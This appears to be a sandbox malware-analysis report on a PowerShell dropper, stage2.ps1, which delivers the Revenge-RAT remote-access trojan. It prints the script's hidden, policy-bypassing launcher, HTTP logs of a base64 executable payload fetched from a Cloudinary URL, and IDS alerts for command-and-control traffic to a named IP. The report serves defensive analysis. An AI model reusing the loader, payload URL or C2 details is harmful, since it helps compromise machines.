                                                                                        SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                        Malicious:false
Preview (line breaks restored; written by csc.exe during the in-memory compile and listing the assemblies the compiled code references, including System.Windows.Forms):
1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):11608
                                                                                        Entropy (8bit):4.890472898059848
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                        MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                        SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                        SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                        SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
Five further dropped files are byte-identical to the one above (same size, hashes and content, each written by a powershell.exe process). They are the AppLocker lockdown-mode test files PowerShell writes on startup and are not malicious.
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):6221
                                                                                        Entropy (8bit):3.726443743960268
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:la1E33CxHxohkvhkvCCtS+NvwoZ7Ht+NvwoZ7H+:la1EyRo9SwHZwHq
                                                                                        MD5:7B936ED7E835FEF97DEB642A0D02E3A5
                                                                                        SHA1:A52C8DF79868EBF2C16009098F466D547C8E6124
                                                                                        SHA-256:E39F4A24550A88CAA9188052CE38E5FC68ADD1D3D8D0D7636D509A9CC975FE7E
                                                                                        SHA-512:B6D9A81DE843B4A4BF6E627275932023195E9DEA0839BB312A1569BF2CCC58F996F420DF7F6F968E64722EFA73ACF2B56F700EB531CD44E32194E92B0797A6ED
                                                                                        Malicious:false
                                                                                        Preview:...................................FL..................F.".. ...-/.v....P\;.K..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....O...K....I.K......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.S...........................%..A.p.p.D.a.t.a...B.V.1......Y.S..Roaming.@......CW.^.Y.S..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.S..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`...........................e..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.S....Q...........
A second dropped file is byte-identical to the one above (same size, hashes and content, written by powershell.exe).
                                                                                        File type:ASCII text, with very long lines (65159)
                                                                                        Entropy (8bit):2.7581536545200263
                                                                                        TrID:
                                                                                          File name:stage2.ps1
                                                                                          File size:946'564 bytes
                                                                                          MD5:86668391bf87240f9b512f7f56e2f4ec
                                                                                          SHA1:b67f1b89d2b5fe4d3121052ad1208211214aa293
                                                                                          SHA256:f666ce7cd0fcb4bf2718c9fb6edcbd825bedae8fd57374931c82a7866975f37d
                                                                                          SHA512:bbcc518162acfd8dd1155d5c19f89674509b954cfe52b1847e40bfe35a1c7f0d6cd0ac53040839c4ceccfd7283b301b5801ce26cb2cf1d51e4e000b181216ce4
                                                                                          SSDEEP:6144:Da3hajoDS2VvhVHzHc4abdm6NNNmy7aBo428Ok8Z3ka:DaEjo22VpJb1abdm6NNNmy7v428E
                                                                                          TLSH:1615FFF0A4C1E081ABF9DD2486AEDD24C6765D713A126E426470E79C1C3F3C39B758AB
                                                                                          File Content Preview:$a = "C:\ProgramData\PDF".New-Item $a -ItemType Directory -Force.Sleep 1....$Content = @'..CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"...'@.[IO.File]::WriteAllText("C:\ProgramData\PDF\1.bat", $Content)...$Content =
                                                                                          Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-11T11:25:17.321307+0100 | 2841113 | ETPRO MALWARE MSIL/Revenge-RAT CnC Checkin M4 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:25:47.326095+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:26:17.341478+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:26:47.356218+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:26:50.966752+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:27:00.231888+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:27:00.351303+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:27:16.419352+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:27:24.841118+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:04.185052+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:32.106992+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:34.028762+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:47.685524+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:28:50.653807+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
2024-12-11T11:29:04.202633+0100 | 2035885 | ET MALWARE MSIL/Revenge-RAT Keep-Alive Activity (Outbound) M2 | 1 | 192.168.2.4 | 49733 | 102.165.46.145 | 333 | TCP
                                                                                          Dec 11, 2024 11:26:47.356218100 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:47.476450920 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:50.966752052 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:51.086081982 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:51.673141956 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:51.675931931 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:51.795303106 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:52.158584118 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:52.160046101 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:52.281950951 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:26:52.282005072 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:26:52.404331923 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:00.231888056 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:00.351212025 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:00.351303101 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:00.470707893 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:06.782187939 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:06.783524990 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:06.904613018 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:07.216712952 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:07.219585896 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:07.338936090 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:07.339102983 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:07.458384037 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:16.419352055 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:16.538744926 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:21.858023882 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:21.859977961 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:21.980254889 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:22.294751883 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:22.296391010 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:22.415735006 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:22.415882111 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:22.535227060 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:24.841118097 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:24.960437059 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:36.967088938 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:36.969122887 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:37.088521957 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:37.399974108 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:37.401290894 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:37.522075891 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:37.522553921 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:37.641886950 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.092341900 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.093977928 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:52.217875957 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.529544115 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.531292915 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:52.654155970 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:27:52.654222012 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:27:52.776010036 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:04.185051918 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:04.310997009 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.201703072 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.203226089 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:07.325504065 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.678388119 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.717473030 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:07.837148905 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:07.837270021 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:07.957387924 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.328274012 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.330218077 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:22.449661016 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.760802984 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.762044907 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:22.881401062 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:22.881623030 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:23.000952005 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:32.106992006 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:32.232434988 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:34.028762102 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:34.154808998 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:37.434170008 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:37.435858965 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:37.563231945 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:37.888564110 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:37.891529083 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:38.016525984 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:38.019783020 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:38.146681070 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:47.685523987 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:47.811211109 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:50.653806925 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:50.778048038 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:52.514342070 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:52.517499924 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:52.643161058 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:52.967658043 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:52.968924999 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:53.094192028 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:28:53.101525068 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:28:53.225230932 CET33349733102.165.46.145192.168.2.4
                                                                                          Dec 11, 2024 11:29:04.202632904 CET49733333192.168.2.4102.165.46.145
                                                                                          Dec 11, 2024 11:29:04.325191975 CET33349733102.165.46.145192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 11, 2024 11:25:11.901866913 CET | 54825 | 53 | 192.168.2.4 | 1.1.1.1
Dec 11, 2024 11:25:12.039607048 CET | 53 | 54825 | 1.1.1.1 | 192.168.2.4
Dec 11, 2024 11:25:27.404480934 CET | 54584 | 53 | 192.168.2.4 | 1.1.1.1
Dec 11, 2024 11:25:27.701514959 CET | 53 | 54584 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 11, 2024 11:25:11.901866913 CET | 192.168.2.4 | 1.1.1.1 | 0xedb1 | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 11, 2024 11:25:27.404480934 CET | 192.168.2.4 | 1.1.1.1 | 0x64 | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 11, 2024 11:25:12.039607048 CET | 1.1.1.1 | 192.168.2.4 | 0xedb1 | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 11:25:12.039607048 CET | 1.1.1.1 | 192.168.2.4 | 0xedb1 | No error (0) | cloudinary.map.fastly.net | - | 151.101.193.137 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 11:25:12.039607048 CET | 1.1.1.1 | 192.168.2.4 | 0xedb1 | No error (0) | cloudinary.map.fastly.net | - | 151.101.65.137 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 11:25:12.039607048 CET | 1.1.1.1 | 192.168.2.4 | 0xedb1 | No error (0) | cloudinary.map.fastly.net | - | 151.101.129.137 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 11:25:12.039607048 CET | 1.1.1.1 | 192.168.2.4 | 0xedb1 | No error (0) | cloudinary.map.fastly.net | - | 151.101.1.137 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 11:25:27.701514959 CET | 1.1.1.1 | 192.168.2.4 | 0x64 | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 11, 2024 11:25:27.701514959 CET | 1.1.1.1 | 192.168.2.4 | 0x64 | No error (0) | cloudinary.map.fastly.net | - | 151.101.1.137 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 11:25:27.701514959 CET | 1.1.1.1 | 192.168.2.4 | 0x64 | No error (0) | cloudinary.map.fastly.net | - | 151.101.65.137 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 11:25:27.701514959 CET | 1.1.1.1 | 192.168.2.4 | 0x64 | No error (0) | cloudinary.map.fastly.net | - | 151.101.129.137 | A (IP address) | IN (0x0001) | false
Dec 11, 2024 11:25:27.701514959 CET | 1.1.1.1 | 192.168.2.4 | 0x64 | No error (0) | cloudinary.map.fastly.net | - | 151.101.193.137 | A (IP address) | IN (0x0001) | false
• res.cloudinary.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 151.101.193.137 | 443 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-11 10:25:13 UTC | 116 | OUT | GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
2024-12-11 10:25:13 UTC | 651 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 22528
    Content-Type: text/plain
    Etag: "cb75e1ff3f0a9c976292f34e67a24826"
    Last-Modified: Tue, 10 Dec 2024 21:06:18 GMT
    Date: Wed, 11 Dec 2024 10:25:13 GMT
    Vary: Accept-Encoding
    Strict-Transport-Security: max-age=604800
    Cache-Control: public, no-transform, immutable, max-age=2592000
    Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-11T10:25:13.542Z;desc=hit,rtt;dur=169
    Server: Cloudinary
    Timing-Allow-Origin: *
    Access-Control-Allow-Origin: *
    Accept-Ranges: bytes
    Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,Vary
    x-request-id: 156949546e77fa312c2e390d2cd36212
                                                                                          Data Ascii: DwBAVgAAEABQVgAAEQBYVgAAEgBgVgAAEwAEgAAAAQAAAAAAAAAAAAAAAAAoBQAABAAAAAAAAAAAAAAAVQLVAwAAAAAEAAAAAAAAAAAAAABVAsUIAAAAAAQAAAAAAAAAAAAAAF4CCw0AAAAABAAAAAAAAAAAAAAAVQLgCwAAAAAKAAAAAAAAAAAAAABeAv0DAAAAAAsAAgAMAAcADQAJAA4ACgAPAAoAEAAKABEACgASAAoAEwAKAAAAAAAAPD4
                                                                                          2024-12-11 10:25:13 UTC1378INData Raw: 55 31 4d 45 55 31 4e 55 4d 79 51 7a 67 33 4f 55 59 79 4d 6a 4d 79 4f 54 6c 46 51 6a 45 31 4e 30 56 45 4e 54 67 78 4d 7a 46 47 4e 44 6c 45 4e 7a 56 44 51 7a 68 45 52 44 68 46 41 45 56 59 52 55 4e 56 56 45 6c 50 54 6c 39 54 56 45 46 55 52 51 42 48 41 45 67 41 52 31 5a 4a 41 45 6f 41 54 51 42 4f 41 46 4e 35 63 33 52 6c 62 53 35 4a 54 77 42 4a 55 41 42 52 41 45 56 54 58 30 4e 50 54 6c 52 4a 54 6c 56 50 56 56 4d 41 56 41 42 48 5a 58 52 42 56 67 42 48 52 6c 63 41 57 41 42 32 59 57 78 31 5a 56 39 66 41 45 64 6c 64 45 4e 68 62 57 56 79 59 51 42 74 63 32 4e 76 63 6d 78 70 59 67 41 38 50 6d 4d 41 55 33 6c 7a 64 47 56 74 4c 6b 4e 76 62 47 78 6c 59 33 52 70 62 32 35 7a 4c 6b 64 6c 62 6d 56 79 61 57 4d 41 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6c 5a 70 63 33 56 68 62
                                                                                          Data Ascii: U1MEU1NUMyQzg3OUYyMjMyOTlFQjE1N0VENTgxMzFGNDlENzVDQzhERDhFAEVYRUNVVElPTl9TVEFURQBHAEgAR1ZJAEoATQBOAFN5c3RlbS5JTwBJUABRAEVTX0NPTlRJTlVPVVMAVABHZXRBVgBHRlcAWAB2YWx1ZV9fAEdldENhbWVyYQBtc2NvcmxpYgA8PmMAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3Vhb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 151.101.1.137 | 443 | 8188 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-11 10:25:29 UTC | 116 | OUT | GET /dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txt HTTP/1.1
    Host: res.cloudinary.com
    Connection: Keep-Alive
2024-12-11 10:25:29 UTC | 645 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 22528
    Content-Type: text/plain
    Etag: "cb75e1ff3f0a9c976292f34e67a24826"
    Last-Modified: Tue, 10 Dec 2024 21:06:18 GMT
    Date: Wed, 11 Dec 2024 10:25:29 GMT
    Vary: Accept-Encoding
    Strict-Transport-Security: max-age=604800
    Cache-Control: public, no-transform, immutable, max-age=2592000
    Server-Timing: cld-fastly;dur=1;start=2024-12-11T10:25:29.331Z;desc=hit,rtt;dur=172
    Server: Cloudinary
    Timing-Allow-Origin: *
    Access-Control-Allow-Origin: *
    Accept-Ranges: bytes
    Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,Vary
    x-request-id: 156949546e77fa312c2e390d2cd36212
                                                                                          2024-12-11 10:25:29 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 44 62 52 39 2b 30 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 67 41 4c 41 54 41 41 41 44 67 41 41 41 41 49 41 41 41 41 41 41 41 41 46 6c 59 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDADbR9+0AAAAAAAAAAOAAIgALATAAADgAAAAIAAAAAAAAFlYAAAAgAAAAYAAAAABAAAAgAAAAAgA
